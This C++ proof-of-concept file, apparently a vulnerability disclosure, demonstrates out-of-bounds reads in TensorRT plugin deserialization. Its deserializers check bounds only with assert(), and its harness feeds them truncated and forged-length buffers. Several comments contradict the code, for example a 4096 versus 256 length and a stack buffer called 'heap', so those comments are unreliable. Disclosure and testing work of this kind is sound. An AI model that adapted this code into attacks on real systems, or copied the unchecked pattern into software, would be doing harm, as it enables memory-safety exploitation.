tensorrt-oob-deserialize-poc / poc_tensorrt_serialize.cpp
ReLrO's picture
Upload poc_tensorrt_serialize.cpp with huggingface_hub
e00c466 verified
/*
* PoC: Out-of-bounds heap read in TensorRT plugin deserialization
*
* Vulnerability: TensorRT's serialize.hpp uses assert()-only bounds checking,
* which is compiled out in release builds (NDEBUG defined). The read<T>()
* function in plugin.h has ZERO bounds checking. When a malicious TensorRT
* engine file (.trt/.engine/.plan) contains a plugin with truncated or
* crafted serialization data, the deserialization reads past the buffer
* boundary.
*
* This PoC demonstrates two bugs:
*
* 1. serialize.hpp vector deserialization (line 101-112):
* - Reads attacker-controlled `size` from buffer
* - Resizes vector to `size`
* - Computes nbyte = size * sizeof(T) (can overflow)
* - assert(*buffer_size >= nbyte) β€” NO-OP in release
* - memcpy from buffer with no bounds check
*
* 2. serialize.hpp string deserialization (line 128-138):
* - Reads attacker-controlled `nbyte` from buffer
* - Resizes string to nbyte
* - assert(*buffer_size >= nbyte) β€” NO-OP in release
* - memcpy from buffer with no bounds check
*
* Affected code:
* - TensorRT/plugin/common/serialize.hpp:55-61 (POD deserialize)
* - TensorRT/plugin/common/serialize.hpp:101-112 (vector deserialize)
* - TensorRT/plugin/common/serialize.hpp:128-138 (string deserialize)
* - TensorRT/plugin/common/plugin.h:100-108 (read<T>() β€” zero checks)
*
* All 30+ TensorRT plugins that use these primitives are affected.
*
* Build and run:
* # Debug (assert enabled β€” catches the bug):
* g++ -fsanitize=address -g -o poc_debug poc_tensorrt_serialize.cpp
* ./poc_debug
*
* # Release (assert disabled β€” ASAN catches OOB read):
* g++ -fsanitize=address -g -DNDEBUG -o poc_release poc_tensorrt_serialize.cpp
* ./poc_release
*/
#include <cassert>
#include <cstring>
#include <iostream>
#include <string>
#include <type_traits>
#include <vector>
// ============================================================================
// Copied verbatim from TensorRT/plugin/common/serialize.hpp
// ============================================================================
template <typename T>
inline void serialize_value(void** buffer, T const& value);
template <typename T>
inline void deserialize_value(void const** buffer, size_t* buffer_size, T* value);
namespace
{
template <typename T, class Enable = void>
struct Serializer
{
};
// POD serializer β€” assert-only bounds check
template <typename T>
struct Serializer<T, typename std::enable_if_t<std::is_arithmetic_v<T> || std::is_enum_v<T>>>
{
static size_t serialized_size(T const&)
{
return sizeof(T);
}
static void serialize(void** buffer, T const& value)
{
::memcpy(*buffer, &value, sizeof(T));
reinterpret_cast<char*&>(*buffer) += sizeof(T);
}
static void deserialize(void const** buffer, size_t* buffer_size, T* value)
{
assert(*buffer_size >= sizeof(T)); // NO-OP when NDEBUG is defined!
::memcpy(value, *buffer, sizeof(T));
reinterpret_cast<char const*&>(*buffer) += sizeof(T);
*buffer_size -= sizeof(T);
}
};
// Vector serializer β€” assert-only bounds check + potential integer overflow
template <typename T>
struct Serializer<std::vector<T>,
typename std::enable_if_t<std::is_arithmetic_v<T> || std::is_enum_v<T>>>
{
static size_t serialized_size(std::vector<T> const& value)
{
return sizeof(value.size()) + value.size() * sizeof(T);
}
static void serialize(void** buffer, std::vector<T> const& value)
{
serialize_value(buffer, value.size());
size_t nbyte = value.size() * sizeof(T);
::memcpy(*buffer, value.data(), nbyte);
reinterpret_cast<char*&>(*buffer) += nbyte;
}
static void deserialize(void const** buffer, size_t* buffer_size, std::vector<T>* value)
{
size_t size;
deserialize_value(buffer, buffer_size, &size);
value->resize(size);
size_t nbyte = value->size() * sizeof(T);
assert(*buffer_size >= nbyte); // NO-OP when NDEBUG is defined!
::memcpy(value->data(), *buffer, nbyte);
reinterpret_cast<char const*&>(*buffer) += nbyte;
*buffer_size -= nbyte;
}
};
// String serializer β€” assert-only bounds check
template <>
struct Serializer<std::string>
{
static size_t serialized_size(std::string const& value)
{
return sizeof(value.size()) + value.size();
}
static void serialize(void** buffer, std::string const& value)
{
size_t nbyte = value.size();
serialize_value(buffer, nbyte);
::memcpy(*buffer, value.data(), nbyte);
reinterpret_cast<char*&>(*buffer) += nbyte;
}
static void deserialize(void const** buffer, size_t* buffer_size, std::string* value)
{
size_t nbyte;
deserialize_value(buffer, buffer_size, &nbyte);
value->resize(nbyte);
assert(value->size() == nbyte);
assert(*buffer_size >= nbyte); // NO-OP when NDEBUG is defined!
::memcpy(const_cast<char*>(value->data()), *buffer, nbyte);
reinterpret_cast<char const*&>(*buffer) += nbyte;
*buffer_size -= nbyte;
}
};
} // namespace
template <typename T>
inline void serialize_value(void** buffer, T const& value)
{
Serializer<T>::serialize(buffer, value);
}
template <typename T>
inline void deserialize_value(void const** buffer, size_t* buffer_size, T* value)
{
Serializer<T>::deserialize(buffer, buffer_size, value);
}
// ============================================================================
// Copied verbatim from TensorRT/plugin/common/plugin.h
// ============================================================================
template <typename OutType, typename BufferType>
OutType read(BufferType const*& buffer)
{
static_assert(sizeof(BufferType) == 1, "BufferType must be a 1 byte type.");
OutType val{};
std::memcpy(&val, static_cast<void const*>(buffer), sizeof(OutType));
buffer += sizeof(OutType);
return val;
}
// ============================================================================
// PoC: Simulate deserializing a malicious plugin from a truncated buffer
// ============================================================================
// Simulates the FlattenConcat plugin deserialization pattern (flattenConcat.cpp:59-78)
// with a truncated/malicious buffer
void poc_read_oob()
{
std::cout << "\n=== PoC 1: read<T>() OOB read (plugin.h pattern) ===" << std::endl;
std::cout << "Simulating FlattenConcat plugin deserialization with truncated buffer\n" << std::endl;
// Create a tiny buffer (only 16 bytes) but pretend it's a full plugin serialization
// A real FlattenConcat expects: bool + int32 + int32 + int32 + (mNumInputs * int32) + ...
// We provide only 16 bytes, but set mNumInputs to 1000
char buffer[16];
memset(buffer, 0x41, sizeof(buffer)); // Fill with 'A' for visibility
// Write mIgnoreBatch (bool), mConcatAxisID (int32=1), mOutputConcatAxis (int32),
// then mNumInputs = 1000 (attacker-controlled)
char* wp = buffer;
*reinterpret_cast<bool*>(wp) = false; wp += sizeof(bool);
*reinterpret_cast<int32_t*>(wp) = 1; wp += sizeof(int32_t); // mConcatAxisID
*reinterpret_cast<int32_t*>(wp) = 0; wp += sizeof(int32_t); // mOutputConcatAxis
// Remaining 3 bytes not enough for mNumInputs β€” read<int32_t> will read OOB
char const* d = buffer;
// These reads will go past the 16-byte buffer:
bool ignoreBatch = read<bool>(d);
int32_t concatAxisID = read<int32_t>(d);
int32_t outputConcatAxis = read<int32_t>(d);
int32_t numInputs = read<int32_t>(d); // reads last 4 bytes β€” still in bounds barely
std::cout << "ignoreBatch=" << ignoreBatch << " concatAxisID=" << concatAxisID
<< " outputConcatAxis=" << outputConcatAxis << " numInputs=" << numInputs << std::endl;
// This read goes PAST the buffer β€” OOB read!
std::cout << "Next read goes OOB..." << std::endl;
int32_t oob_value = read<int32_t>(d); // <-- HEAP BUFFER OVERFLOW READ
std::cout << "OOB read value: " << oob_value << std::endl;
}
// Demonstrates the string deserialization with crafted length
void poc_string_deserialize_oob()
{
std::cout << "\n=== PoC 2: String deserialization OOB (serialize.hpp) ===" << std::endl;
// Create a buffer with: size_t length = 4096, but only 8 bytes of actual string data
// In release builds (NDEBUG), the assert is removed and memcpy reads 4096 bytes
// from a buffer that only has 8 bytes remaining
const size_t fake_length = 256; // claim string is 256 bytes
const size_t actual_data = 8; // but only provide 8 bytes after the length field
size_t total_buf_size = sizeof(size_t) + actual_data;
char* buffer = new char[total_buf_size];
memcpy(buffer, &fake_length, sizeof(size_t)); // write the fake length
memset(buffer + sizeof(size_t), 'B', actual_data); // write 8 bytes of data
void const* ptr = buffer;
size_t remaining = total_buf_size;
std::string result;
#ifdef NDEBUG
std::cout << "NDEBUG defined β€” assert() is disabled, OOB read will occur" << std::endl;
#else
std::cout << "NDEBUG not defined β€” assert() will catch the bug (this is expected in debug)" << std::endl;
std::cout << "Recompile with -DNDEBUG to see the OOB read" << std::endl;
#endif
// This will:
// 1. Read size_t fake_length (256) from buffer
// 2. Resize string to 256
// 3. assert(remaining >= 256) β€” NO-OP in release!
// 4. memcpy 256 bytes from buffer that only has 8 bytes β€” OOB READ
deserialize_value(&ptr, &remaining, &result);
std::cout << "String length: " << result.size() << std::endl;
std::cout << "First 8 chars: " << result.substr(0, 8) << std::endl;
delete[] buffer;
}
int main()
{
std::cout << "TensorRT Plugin Deserialization PoC" << std::endl;
std::cout << "====================================" << std::endl;
#ifdef NDEBUG
std::cout << "Build mode: RELEASE (NDEBUG defined β€” assert() disabled)" << std::endl;
#else
std::cout << "Build mode: DEBUG (assert() enabled)" << std::endl;
#endif
poc_read_oob();
poc_string_deserialize_oob();
return 0;
}